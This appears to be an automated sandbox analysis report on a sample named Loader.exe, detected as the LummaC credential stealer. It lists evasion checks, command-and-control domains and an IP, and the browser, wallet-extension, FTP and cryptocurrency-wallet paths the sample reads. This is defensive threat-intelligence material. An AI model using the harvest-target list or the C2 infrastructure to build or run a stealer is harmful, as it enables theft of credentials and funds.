              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_0043C330 LdrInitializeThunk,1_2_0043C330
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C47BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_011C47BC
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00AFEB50 mov eax, dword ptr fs:[00000030h]1_2_00AFEB50
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_00AFF790 mov eax, dword ptr fs:[00000030h]1_2_00AFF790
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C4330 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_011C4330
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C47BC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_011C47BC
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C8BE4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_011C8BE4

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
              Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
              Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
              Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
              Source: Loader.exe, 00000001.00000002.2711429352.0000000000AB0000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
              Source: C:\Users\user\Desktop\Loader.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeCode function: 1_2_011C46A3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_011C46A3
              Source: C:\Users\user\Desktop\Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Loader.exe, 00000001.00000003.2660783647.000000000147E000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000003.2660737993.0000000001475000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2712486611.00000000013D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Loader.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 6448, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\Loader.exeDirectory queried: C:\Users\user\Documents\TTCBKWZYOCJump to behavior
              Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 6448, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Loader.exe PID: 6448, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Screen Capture              		21
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
              Deobfuscate/Decode Files or Information              		LSASS Memory131
              Security Software Discovery              		Remote Desktop Protocol1
              Archive Collected Data              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
              Obfuscated Files or Information              		Security Account Manager11
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares31
              Data from Local System              		113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		NTDS1
              Process Discovery              		Distributed Component Object Model2
              Clipboard Data              		Protocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets11
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials23
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Loader.exe58%ReversingLabsWin32.Trojan.CrypterX
              Loader.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ingreem-eilish.biz
              		104.21.90.135
              		truetrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                sordid-snaked.cyoufalse
                  		high
                  awake-weaves.cyoufalse
                    		high
                    immureprech.bizfalse
                      		high
                      deafeninggeh.bizfalse
                        		high
                        debonairnukk.xyzfalse
                          		high
                          diffuculttan.xyzfalse
                            		high
                            effecterectz.xyzfalse
                              		high
                              wrathful-jammy.cyoufalse
                                		high
                                https://ingreem-eilish.biz/apitrue
                                  		unknown
                                  ingreem-eilish.biztrue
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
